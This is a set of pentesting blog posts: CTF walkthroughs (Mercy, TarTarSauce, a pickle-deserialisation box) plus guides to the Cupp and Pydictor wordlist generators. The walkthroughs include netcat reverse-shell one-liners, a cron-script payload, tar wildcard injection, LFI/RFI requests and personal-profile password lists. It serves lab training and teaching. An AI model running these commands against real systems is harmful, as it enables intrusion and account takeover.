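def load_like_notes(data: bytes) -> Any:
    """What a loader built on pickle.loads()/pickle.load() does with attacker bytes:
    REDUCE calls whatever GLOBAL pushed, before any 'is this a note?' check can run."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: find_class() is the only hook through which a pickle reaches
    Python objects, so an allow-list here stops os.system, subprocess and friends."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"),
               ("builtins", "set")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_restricted(data: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_blocks(data: bytes) -> bool:
    """True when the hardened loader refuses the stream."""
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


def demo() -> dict:
    """Exercise all three behaviours: the unsafe load runs the call, the restricted load
    refuses the payload, and the restricted load still accepts an ordinary pickled note."""
    return {
        "executed": load_like_notes(HARMLESS_PAYLOAD) == os.getcwd(),
        "blocked": restricted_blocks(HARMLESS_PAYLOAD),
        "legit_ok": load_restricted(pickle.dumps({"note": "hello"})) == {"note": "hello"},
    }


if __name__ == "__main__":
    print(opcode_names(HARMLESS_PAYLOAD))
    print(demo())
```

The allow-list is the real fix; for a notes application, storing notes as JSON removes the problem entirely, since json.loads() cannot name callables at all.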

Now run the notes binary and load the file from /tmp via the traversal prefix:
./notes
load ../../tmp/shell
As soon as the file is loaded we get a shell. id shows it carries the curtiz group, so we can enter curtiz’s home directory.
cd /home/curtiz
Its listing shows a file called notes, whose content hints at logging in as the user Marie.
ls
cat notes
We check /etc/passwd for a user “Marie” and find that Marie is the first name of the user delacroix, whose login shell is a custom /bin/delacroix.
grep Marie /etc/passwd
Let’s look at the printable strings in /bin/delacroix with the strings utility; among them is an MD5 hash.
strings /bin/delacroix
MD5 cannot be reversed, but looking the hash up online gives “VonBraun”.
We tried to log in as delacroix over SSH with that password, but it did not work.
Back in /home/curtiz there was a file called id_rsa, which turned out to be an RSA private key.
cat id_rsa
We copied the key to our machine and logged in over SSH with it.
In /home/delacroix we found two scripts, check.sh and generate.sh. check.sh prints the customised login message; generate.sh creates a fresh .last file and derives a password from that file’s timestamp by hashing it with MD5.
So we need the MD5 of the time at which .last was created. stat shows that time:
stat .last
We then reproduce the script’s hashing step: echo the creation time into md5sum (echo appends a newline, and the hash must be of exactly what the script hashed):
echo 00:19:51 | md5sum
With that password we run sudo bash, and BOOM: we are root.
Now look around for the flag: change into /root and list it; the file flag is there.
cd /root
ls
file reports that flag is PNG image data.
file flag
Let’s transfer it to our Kali machine with netcat. Start the listener on Kali first, redirecting the incoming data to a new file:
nc -lvp 5555 > flag
Then send the file from the target:
nc 192.168.1.109 5555 < flag
Finally we open the flag image, and we are done.

Mercy: Vulnhub Walkthrough


MERCY is a machine dedicated to Offensive Security for the PWK course. The name is a play on words and has nothing to do with the contents of the vulnerable machine. You can download the Mercy vulnerable lab from here. The challenge is to get root on the target VM and read proof.txt in root’s directory.
Flag: proof.txt
Tables of Contents:
·         IP discovery and Port Scanning.
·         Browsing the IP on port 8080.
·         Decoding Base64 String.
·         Using Enum4linux tool for enumerating information of the Target Machine.
·         Getting Login Credentials to connect via smbclient.
·         Port Knocking.
·         Discovering accessible directories on the victim’s machine.
·         Browsing through the discovered directories.
·         Searching exploit via searchsploit.
·         Finding Login Credentials for Tomcat Server.
·         Logging into Tomcat Server using Metasploit.
·         Exploiting Misconfiguration in the Target Machine.
·         Using Msfvenom for creating payload one-liner.
·         Getting root access.
·         Reading the flag.
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover



We found our target –> 192.168.1.105
Next we scan the target IP with nmap.
nmap -A 192.168.1.105



The nmap output lists the following ports: 22 (ssh), 53 (domain), 80 (http), 110 (pop3), 139 (netbios-ssn), 143 (imap), 445 (netbios-ssn), 993 (ssl/imaps), 995 (ssl/pop3) and 8080 (http). Port 80 is reported as filtered rather than open, so the web root cannot be browsed yet. The scan also shows a robots.txt entry, /tryharder/tryharder, which may come in handy later. Port 8080 runs Apache Tomcat (Coyote JSP engine 1.1), so we browse the target on port 8080.



Browsing to /tryharder/tryharder on port 8080 gave us a base64-encoded string, which we clearly need to decode to move ahead.



On decoding the base64 string we found some Login Credentials which can be of great use later on.



Since port 445 is open on the target, we enumerated it with enum4linux.
enum4linux -a 192.168.1.105
It listed a few shares that we can connect to with smbclient.



We connect with smbclient using the credentials qiu:password found earlier.
smbclient //192.168.1.105/qiu -U qiu
Exploring the share, we downloaded the config file to our Linux desktop.



Reading the contents of the config file gave us a sequence of ports to knock which will result in opening the http port 80.



We knock the sequence of ports with the knock client:
knock 192.168.1.105 159 2739 4
A fresh nmap scan confirms that port 80 is now open.
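For cases where the knock client is not available, here is an added Python example (my own, not the VM’s or knockd’s code) that does what knock does: one TCP connection attempt per port, in order, with a pause in between. It also parses the sequence out of a knockd.conf, since that is the file you usually recover. The configuration and its port numbers are constructed for the demonstration (not Mercy’s real sequence), and loopback_demo() exercises the knocker against local sockets so it runs without a target.

```python
import socket
import time
from typing import List, Sequence, Tuple

# Constructed knockd.conf, shaped like the file recovered from the share. Port numbers are
# made up for the demonstration, not the VM's real sequence.
SAMPLE_KNOCKD_CONF = """\
[options]
    UseSyslog

[openHTTP]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[closeHTTP]
    sequence    = 9000,8000,7000
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_sequence(config: str, section: str) -> List[int]:
    """Return the port sequence declared in [section]. knockd also accepts 'port:udp'
    entries; the protocol suffix is dropped here because this client knocks over TCP only."""
    current = None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current == section and line.split("=", 1)[0].strip() == "sequence":
            return [int(p.strip().split(":")[0]) for p in line.split("=", 1)[1].split(",")]
    raise KeyError(f"no sequence in section {section!r}")


def knock(host: str, ports: Sequence[int], delay: float = 0.2,
          timeout: float = 0.5) -> List[Tuple[int, str]]:
    """One TCP connection attempt per port, in order, with a pause between them. The knock
    daemon only watches the SYNs, so a refused or timed-out connection is still a valid
    knock; the outcome is recorded so the operator can see what happened."""
    results = []
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            results.append((port, "connected"))
        except (ConnectionRefusedError, socket.timeout):
            results.append((port, "sent"))
        finally:
            sock.close()
        time.sleep(delay)
    return results


def loopback_demo() -> List[str]:
    """Self-test without a knockd: two listening sockets plus one port we know is closed,
    knocked in order; returns the outcome labels in knock order."""
    listeners = []
    for _ in range(2):
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        listeners.append(srv)
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                                # now free, so a connect is refused
    sequence = [s.getsockname()[1] for s in listeners] + [closed_port]
    try:
        return [outcome for _port, outcome in knock("127.0.0.1", sequence, delay=0)]
    finally:
        for s in listeners:
            s.close()


if __name__ == "__main__":
    print(parse_knockd_sequence(SAMPLE_KNOCKD_CONF, "openHTTP"))
    print(loopback_demo())
```

Keep the delay: knockd matches the sequence within seq_timeout seconds, but a burst of SYNs can arrive out of order through NAT or a busy link, and an out-of-order knock simply resets the sequence.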


With port 80 open, we browsed the target IP, which displayed only the message shown in the image, of no use for moving on.


Now we thought of enumerating for accessible directories on the Target Machine.
dirb http://192.168.1.105


While browsing robots.txt file in the browser gave us two disallowed hidden directories as shown in the image.


Browsing to 192.168.1.105/nomercy opened a vulnerability scanner web page whose banner, RIPS 0.53, left us curious to search more about it.


Searching RIPS 0.53 in searchsploit turned up a Multiple Local File Inclusion exploit. We copied the exploit to our Linux desktop and read it as shown in the image; from it we took the proof-of-concept request /windows/code.php?file=../../../../../../etc/passwd.


We used the LFI to read the passwd file, exactly as the PoC shows.
192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd

Since we know Tomcat is running on the target, we used the same LFI to read tomcat-users.xml, the file that holds the manager credentials. Browsing to it gave us two sets of login credentials for the Tomcat server, as shown in the image.
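The ../ chain above works because the file parameter is joined onto a directory and opened without a boundary check. The Python below is an added example (mine, not RIPS code and not from the original post) showing that vulnerable shape beside a hardened version that canonicalises the path and refuses anything outside the intended directory, including absolute paths. demo() builds a constructed directory tree with a stand-in for /etc/passwd so it can be run anywhere.

```python
import os
import tempfile
from typing import Dict


def vulnerable_include(base_dir: str, user_file: str) -> str:
    """Shape of the RIPS bug: a request parameter is joined onto a directory and opened
    as-is, so '../' sequences (or an absolute path) walk out of the intended tree."""
    with open(os.path.join(base_dir, user_file), encoding="utf-8") as fh:
        return fh.read()


def safe_include(base_dir: str, user_file: str) -> str:
    """Hardened form: canonicalise both sides (resolving symlinks and '..'), then refuse
    anything whose real path is not inside base_dir. Where the set of includable files is
    known, an allow-list of names is better still."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_file))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{user_file!r} escapes {base_dir}")
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def demo() -> Dict[str, bool]:
    """Constructed fixture: <tmp>/secret.txt sits outside <tmp>/app/windows, the directory
    the include is supposed to be confined to. Returns what each loader did."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    windows = os.path.join(root, "app", "windows")
    os.makedirs(windows)
    with open(os.path.join(windows, "help.txt"), "w") as fh:
        fh.write("legit include\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")   # stands in for /etc/passwd

    def blocked(path: str) -> bool:
        try:
            safe_include(windows, path)
            return False
        except PermissionError:
            return True

    return {
        "vulnerable_leaks": vulnerable_include(windows, "../../secret.txt").startswith("root:x:0:0"),
        "safe_serves_legit": safe_include(windows, "help.txt") == "legit include\n",
        "safe_blocks_traversal": blocked("../../secret.txt"),
        "safe_blocks_absolute": blocked("/etc/passwd"),
        "safe_blocks_deep_traversal": blocked("../../../../../../etc/passwd"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:28} {result}")
```

Note the absolute-path case: os.path.join() discards the base when the second argument starts with /, so a check that only looks for ".." in the input would still be bypassed; comparing canonical paths catches both.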


We log into the Tomcat server with Metasploit’s Tomcat Manager upload module, using the credentials thisisasuperduperlonguser:heartbreakisinevitable
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable
msf exploit(multi/http/tomcat_mgr_upload) > exploit
Now using a one-liner to spawn a tty shell:
python -c 'import pty; pty.spawn("/bin/sh")'

Then we switch to the user fluffy, whose password came from the second entry in tomcat-users.xml.
su fluffy
Password: freakishfluffybunny


Exploring the filesystem, we found a script named timeclock whose contents suggest it is run periodically by a cron job as root. Since the file is writable by fluffy, anything we append to it runs as root.


Moving on! We generated a one-liner payload with msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R


Then we appended the one-liner to the timeclock file (the mkfifo construction is msfvenom’s way of wiring netcat’s input and output to a shell without needing nc -e):
echo "mkfifo /tmp/zlat; nc 192.168.1.109 8888 0</tmp/zlat | /bin/sh >/tmp/zlat 2>&1; rm /tmp/zlat" >> timeclock


When cron next ran timeclock, the one-liner executed with it and we got a reverse shell on our netcat listener on port 8888. We spawned a TTY with python -c 'import pty; pty.spawn("/bin/sh")'. Booyeah!! We have root and found proof.txt; reading it greets us with a congratulatory message.
 



Comprehensive Guide on Cupp– A wordlist Generating Tool


Hello Friends!! Today we are going to explore Cupp, a tool that builds a wordlist tailored to a particular person, for use in brute-force attacks that guess that person’s login credentials.
Table of Content
Introduction to Cupp
How Cupp Works
Installation and Configuration
Generating Custom Dictionary
Adding to Custom Dictionary
Downloading Dictionaries from Cupp Repository 
Downloading Default Usernames and Passwords
Quiet Mode

Introduction to Cupp
Cupp stands for Common User Passwords Profiler. It can be used in many circumstances, such as authorised penetration tests or forensic investigations. CUPP is cross-platform, written in Python, and simple to use, with very powerful results. It is a social engineer’s best friend when it comes to creating targeted password dictionaries tailored to an individual.
How Cupp Works
Cupp takes vectors from the profiling done on an individual, such as their nickname, pet’s name or child’s birthdate. It works on the principle that a password is, more often than not, a combination of things known to that individual: personal details that are close to the person’s heart.
For the cases where a person swaps letters for look-alike digits or symbols (leet becomes 133t), Cupp has a leet mode that applies those substitutions.
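To make that principle concrete, here is an added Python example (mine, not Cupp’s code) with a miniature profiler: case variants of each fact, pairs glued together, birthdate fragments and special characters appended, a leet pass, and a length filter. The substitution table, the birthdate format (DDMMYYYY, as Cupp asks for it) and the sample profile are assumptions for the demonstration; Cupp’s own combinations are richer.

```python
import itertools
from typing import Dict, Set

# Assumed leet table for the demonstration; Cupp ships its own.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}


def leet_variants(word: str) -> Set[str]:
    """Every combination of swapping or keeping each leet-able letter. Cupp's leet mode does a
    single full substitution; this broader set is what a cracker usually wants."""
    choices = [(ch,) if ch.lower() not in LEET else (ch, LEET[ch.lower()]) for ch in word]
    return {"".join(combo) for combo in itertools.product(*choices)}


def date_fragments(ddmmyyyy: str) -> Set[str]:
    """Cupp asks for a birthdate as DDMMYYYY and reuses its pieces: year, short year,
    day+month, day+month+short year and the whole date."""
    if len(ddmmyyyy) != 8 or not ddmmyyyy.isdigit():
        return set()
    day, month, year = ddmmyyyy[:2], ddmmyyyy[2:4], ddmmyyyy[4:]
    return {year, year[2:], day + month, day + month + year[2:], ddmmyyyy}


def profile_wordlist(facts: Dict[str, str], birthdate: str = "", specials: str = "!@#",
                     leet: bool = True, min_len: int = 6, max_len: int = 16) -> Set[str]:
    """Cupp's approach in miniature: case variants of each fact, every ordered pair glued
    together, date fragments and special characters appended, optional leet, then a length
    filter so the list only holds candidates a password policy would accept."""
    tokens = {v.strip() for v in facts.values() if v and v.strip()}
    cased = set()
    for t in tokens:
        cased.update({t.lower(), t.capitalize(), t.upper()})
    combos = set(cased)
    combos.update(a + b for a, b in itertools.permutations(cased, 2))
    suffixes = [""] + sorted(date_fragments(birthdate))
    words = set()
    for stem in combos:
        for suffix in suffixes:
            words.add(stem + suffix)
            words.update(stem + suffix + sp for sp in specials)
    if leet:
        words = set(itertools.chain.from_iterable(leet_variants(w) for w in list(words)))
    return {w for w in words if min_len <= len(w) <= max_len}


if __name__ == "__main__":
    # Constructed profile for the demonstration.
    candidates = profile_wordlist({"name": "raj", "pet": "fluffy"}, birthdate="17031990")
    print(len(candidates), "candidates, e.g.", sorted(candidates)[:10])
```

The output grows quickly: every extra fact multiplies the pair combinations, and every leet-able letter doubles a word’s variants. That is the trade-off behind Cupp’s prompts about adding special characters and leet mode, so answer them with the target’s likely password policy in mind.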

Installation and Configuration
Cupp can be downloaded from GitHub with git clone. Within the downloaded cupp folder, run cupp.py; started without arguments it prints the options it offers.
cd cupp
ls
./cupp.py

Optional arguments:

-i             Interactive questions for user password profiling
-w FILENAME    Use this option to improve an existing dictionary
-l             Download huge wordlists from the repository
-a             Parse default usernames and passwords directly from the Alecto DB.
               Project Alecto uses purified databases of Phenoelit and CIRT, merged and enhanced.
-q             Quiet mode (don’t print the banner)
-v             Version of the program


Generating Custom Dictionary
Now it’s time to have some fun!
We use the interactive option to generate the custom dictionary. It asks for details such as the pet’s name, child’s name and partner’s nickname, all highly personal things that turn up in passwords one way or another.
There is also the option to add specific keywords, special characters and random numbers, and to activate leet mode, which makes the dictionary considerably more effective.
That’s all; the dictionary is generated and saved.
./cupp.py -i


Adding to Custom Dictionary
Cupp can also extend an existing dictionary: given a wordlist, it adds variations of its words according to the options you pick.
./cupp.py -w raj.txt
Once the command has finished, we check the output location to confirm the file was written. In this case the output is /root/cupp/raj.txt.cupp.txt.
Downloading Dictionaries from Cupp Repository 
Cupp has its own repository of pre-classified dictionaries that can be downloaded and used. The downloaded files are gzip-compressed and have to be decompressed before viewing.
Enter the number of the dictionary you want to download; we pressed 16 to download a dictionary of Hindi names.
./cupp.py -l
cd dictionaries
cd hindi
gzip -d hindu-names.gz
cat hindu-names

Downloading Default Usernames and Passwords
Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.
./cupp.py –a
ls
cat alectodb-password.txt

Quiet Mode
Quiet mode runs Cupp in a more hush-hush way. If you would rather not have a big banner on your screen showing everyone what you are doing, you will like this option: it makes for a cleaner screen while Cupp carries out your commands, without the cow popping up on top.
We couple quiet mode with the dictionary download option demonstrated above.
./cupp.py -a -q

We hope you enjoyed this basic walkthrough of the Cupp application. It is a very handy and easy to use tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.
Stay tuned for more articles on the latest and greatest in hacking!!!

Comprehensive Guide on Pydictor – A wordlist Generating Tool


In this article we explore another dictionary-building tool, Pydictor. These tools are always fun to work with, and this is another robust one for generating custom dictionaries. What stands out most is the range of customisation options it offers, from the most common to the advanced.
Table of Content
§  What is Pydictor
§  Installation
§  Numeric Dictionary
§  Lower Case Alphabet Dictionary
§  Upper Case Alphabet Dictionary
§  Numeral Coupled With Upper Case Alphabet
§  Upper Case Coupled With Lower Case Alphabet               
§  Numeral Coupled With Lower Case Alphabet
§  Combining Upper Case, Lower Case and Numeral
§  Adding Static Head
§  Adding Static Tail
§  Encoding
§  Character Permutation
§  Multiple Character Group Permutation
§  Social Engineering Dictionary
§  Customizing the Social Engineering Dictionary
§  Manipulating Dictionary Complexity Filter
§  Using Plugin
§  Leet Function

What is Pydictor
Pydictor is one of those tools that both novices and pros can appreciate. It is a dictionary-building tool worth having in your arsenal for password strength tests, with a plethora of features for building the right dictionary for pretty much any testing situation.
Installation
Let’s get cracking. First we download Pydictor from GitHub and run it with Python; executed without arguments it prints its usage, from which the options below are taken.
cd pydictor
python pydictor.py
-base                 [type]
-base Type            Choose from (d, L, c, dL, dc, Lc, dLc)
                        d     digits                      [0-9]
                        L     lowercase letters           [a-z]
                        c     capital letters             [A-Z]
                        dL    mix d and L                 [0-9 a-z]
                        dc    mix d and c                 [0-9 A-Z]
                        Lc    mix L and c                 [a-z A-Z]
                        dLc   mix d, L and c              [0-9 a-z A-Z]
-char                 [custom_char]
-chunk                [chunk1] [chunk2] ...
-extend               [string_or_file]
-plug                 [pid6,ftp,pid8,birthday,pid4,scratch]
-plug arg [arg ...]   birthday  [begin_date] [end_date], date format: [YYYYMMDD]
                      ftp       [keyword1] [keyword2] ...
                      pid4      chinese id card last 4 digit
                      pid6      chinese id card last 6 digit
                      pid8      chinese id card last 8 digit
                      scratch   [url_or_file]
--conf                [expression_or_file]
-o, --output          [directory]
-tool                 [handler,hybrider,uniqifer,uniqbiner,shredder,comparer,counter,combiner]
--len                 [minlen] [maxlen]
--head                [prefix_string]
--tail                [suffix_string]
--encode              [none,sha1,sha512,b64,url,md516,des,rsa,b32,b16,test,sha256,execjs,hmac,md5]
--occur               [letter] [digital] [special]
--types               [letter] [digital] [special]
--regex               [regex]
--level               [code]
--leet                [code]




Numeric Dictionary
We begin with the option to create a numeric (or, as the tool calls it, digital) dictionary. Keep it simple: five characters long, drawn from the digits 0-9, which gives 100,000 words. The -base option selects the character class.
The output is always saved to a file; -o sets the directory it goes in (dict.txt here, as in the listing), and the location is printed after each run. The cat command is used to view the output in the terminal.
python pydictor.py --len 5 5 -base d -o dict.txt



Lower Case Alphabet Dictionary
We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.
python pydictor.py --len 5 5 -base L



Upper Case Alphabet Dictionary
We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.
The result is visible to see.
python pydictor.py --len 5 5 -base c



Numeric Coupled With Upper Case Alphabet
The base options in Pydictor can be used in conjunction with each other, in this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.
python pydictor.py --len 5 5 -base dc



Upper Case Coupled With Lower Case Alphabet
This time it’s going to be both upper and lower case alphabets together.
python pydictor.py --len 5 5 -base Lc


Numeral Coupled With Lower Case Alphabet
Let’s see what we get when we couple numerals with lower case alphabets.
python pydictor.py --len 5 5 -base dL
 


Combining Upper Case, lower Case and Numeral
Now let’s combine all the 3 options that we’ve been playing. We will now combine upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.
python pydictor.py --len 3 3 -base dLc


Adding Static Head
We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.
python pydictor.py --len 5 5 --head raj -base d


Adding Static Tail
We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.
python pydictor.py --len 5 5 --tail raj -base d


Encoding
Pydictor has an encode function that we can use to encode the words in the dictionary.
It offers popular encodings and hashes such as Base64, DES, MD5 and SHA256 (note that hashes are one-way: a hashed wordlist is for matching captured hashes, not for submitting passwords). In this instance we use Base64 to encode the numerals.
In the interest of thoroughness, we first generate the numerals without encoding and then with encoding.
python pydictor.py --len 5 5 -base d


Now we see what the Base64 encoded output looks like
python pydictor.py --len 5 5 -base d --encode b64



Character Permutation
We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.
python pydictor.py -char raj



Multiple Character Group Permutation
We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.
This time we give it several groups of characters, and it churns out as many orderings of them as it can. It begins subtly, manipulating one group, and then gradually moves on to the others. Notice the progression in the screenshot below.
python pydictor.py -chunk abc ABC 666 . _ @ "'
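The options used in the sections above (-base with --len, --head and --tail, --encode, -char and -chunk), plus the --occur filter used further down, are easy to re-create, and doing so is the quickest way to understand exactly what each one produces. The Python below is an added example, my own code and not pydictor’s; where pydictor’s exact semantics are not documented here, in particular for -char and -chunk, the functions treat both as orderings of every non-empty subset, which is an assumption.

```python
import base64
import hashlib
import itertools
import operator
import re
import string
from typing import Iterable, Iterator, Sequence

BASES = {"d": string.digits, "L": string.ascii_lowercase, "c": string.ascii_uppercase}
ENCODERS = {
    "none": lambda w: w,
    "b64": lambda w: base64.b64encode(w.encode()).decode(),
    "md5": lambda w: hashlib.md5(w.encode()).hexdigest(),
    "sha256": lambda w: hashlib.sha256(w.encode()).hexdigest(),
}
_OPS = {">=": operator.ge, "<=": operator.le, "==": operator.eq, ">": operator.gt, "<": operator.lt}


def charset(base: str) -> str:
    """-base d, L, c and their mixes dL, dc, Lc, dLc."""
    return "".join(BASES[ch] for ch in base)


def base_words(base: str, min_len: int, max_len: int, head: str = "", tail: str = "",
               encode: str = "none") -> Iterator[str]:
    """--len MIN MAX over the -base alphabet; --head/--tail are added on top of that length
    and --encode is applied to the finished word (so the md5 of 'raj00000', not of '00000')."""
    chars, enc = charset(base), ENCODERS[encode]
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(chars, repeat=n):
            yield enc(head + "".join(combo) + tail)


def char_permutations(word: str) -> Iterator[str]:
    """-char (assumed semantics): every distinct ordering of any non-empty subset of the
    word's characters."""
    seen = set()
    for r in range(1, len(word) + 1):
        for perm in itertools.permutations(word, r):
            s = "".join(perm)
            if s not in seen:
                seen.add(s)
                yield s


def chunk_words(chunks: Sequence[str]) -> Iterator[str]:
    """-chunk (assumed semantics): like -char, but the units being reordered are whole groups."""
    seen = set()
    for r in range(1, len(chunks) + 1):
        for perm in itertools.permutations(chunks, r):
            s = "".join(perm)
            if s not in seen:
                seen.add(s)
                yield s


def occur_ok(word: str, letters: str, digits: str, specials: str) -> bool:
    """--occur style filter: three comparisons (e.g. '>=0' '>=4' '<=1') applied to how many
    letters, digits and other characters the word contains, in that order."""
    def check(expr: str, count: int) -> bool:
        m = re.fullmatch(r"(>=|<=|==|>|<)(\d+)", expr.strip())
        if not m:
            raise ValueError(f"bad comparison {expr!r}")
        return _OPS[m.group(1)](count, int(m.group(2)))

    n_letters = sum(ch.isalpha() for ch in word)
    n_digits = sum(ch.isdigit() for ch in word)
    n_specials = len(word) - n_letters - n_digits
    return check(letters, n_letters) and check(digits, n_digits) and check(specials, n_specials)


def count_words(words: Iterable[str]) -> int:
    return sum(1 for _ in words)


if __name__ == "__main__":
    print(count_words(base_words("d", 5, 5)), "five-digit words")
    print(list(itertools.islice(base_words("d", 5, 5, head="raj", encode="b64"), 3)))
    print(sorted(chunk_words(["abc", "ABC", "666"]))[:6])
```

Generators are used throughout because these lists get large fast: -base dLc at length 5 is 62^5, roughly 916 million words, which is why pydictor itself streams to disk rather than holding the list in memory.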



Social Engineering Dictionary
Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a tailored dictionary. We run help desc within the builder to see the various vectors it supports.
python pydictor.py --sedb



Customizing the Social Engineering Dictionary
“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target, so as to generate a target-specific dictionary. In this instance we will only be inputting the name, birth date, email and phone number. The vectors are set using the “set” command.



Let’s see what our social engineering dictionary output looks like.



Manipulating Dictionary Complexity Filter
We will be doing two things in this instance: extending a dictionary based on a rule, and separating out words filtered according to complexity level. The complexity level is 3 by default; we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.
We view the latter part of the output.
python pydictor.py -extend raj --level 4 --len 1 6



Using Plugin
Pydictor has plugins built into it by default. We will be using a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number, and we will filter the output with the “--occur” option. It takes three conditions, in this order: letter, numeral and special character. We will only be looking for results that have numerals occurring 4 times or more in a single string.
python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"



Leet Function
The leet function can selectively substitute numerals or special characters for letters; for example, “leet” becomes “l33t”. We will be using the leet function in conjunction with the occur option and the extend function.
This is a more complex ask than we have made of Pydictor in our earlier instances; let’s see what our output looks like.
python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"



We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool gives the user a lot of advanced options, which can be a bit overwhelming unless the user has a very clear picture of what they want out of it.
Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.
Stay tuned for more articles on the latest and greatest in hacking.


Hack the Box: TarTarSauce Walkthrough

Today we are going to solve another CTF challenge, “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Expert
Task: To find the user.txt and root.txt files
Note: Since these labs are available online, they have a static IP. The IP of TarTarSauce is 10.10.10.88
Penetrating Methodology
§  Network scanning (Nmap)
§  Directory Enumeration (Dirb)
§  Exploiting WordPress RFI vulnerability
§  Spawning TTY shell
§  Check sudoers list permissions
§  Wildcard injection privilege escalation
§  Modify backup file to get root flag


Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -A 10.10.10.88
From the image below, you can see that port 80 is open for the HTTP service and that robots.txt has 5 disallowed entries.





Let’s navigate to port 80 through a web browser. Entering the IP in the URL box brings up the following web page, as shown in the image below.


We don’t find anything on the webpage, so we run dirb to enumerate directories. We find a directory called “/webservices/”. As we don’t find anything in that directory, we enumerate “/webservices/” further.
dirb http://10.10.10.88
dirb http://10.10.10.88/webservices/


The dirb scan gives us a directory called “/webservices/wp/” that hosts a WordPress site.



We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).




We follow the instructions in the PoC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to the desktop and rename it to wp-load.php so that our PHP shell is executed via the RFI. We start a Python HTTP server to exploit the RFI on the target machine.
python -m SimpleHTTPServer 80



We set up our listener using netcat; as soon as we execute our PHP shell through the RFI, we get a reverse shell. We go to the “/home” directory and find a folder called “onuma”, which we are unable to access. So we spawn a TTY shell using Python to check the sudoers list.
python -c 'import pty; pty.spawn("/bin/bash")'
We check the sudoers list and find that we can run tar as user “onuma” without a password. Hence we can exploit wildcard injection for privilege escalation.
sudo -l




We create an nc reverse shell using msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R



Now we move to the reverse shell, create a bash file containing the nc command and save it as “wp.sh”.
tar can execute a command via “--checkpoint-action”, so we create two files named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1”; when the wildcard expands, tar reads these file names as options and executes our command as user onuma.
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh >/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *
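The wildcard injection above works because the shell, not tar, expands “*”, so file names arrive in tar’s argument list looking exactly like options. As an added example (not part of the original walkthrough), the following POSIX shell functions show the defender’s side: a check that flags option-like file names in a directory, and an archive helper that never lets such names reach tar as options. It assumes GNU tar; the directory and file names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original walkthrough). Assumes GNU tar.
#
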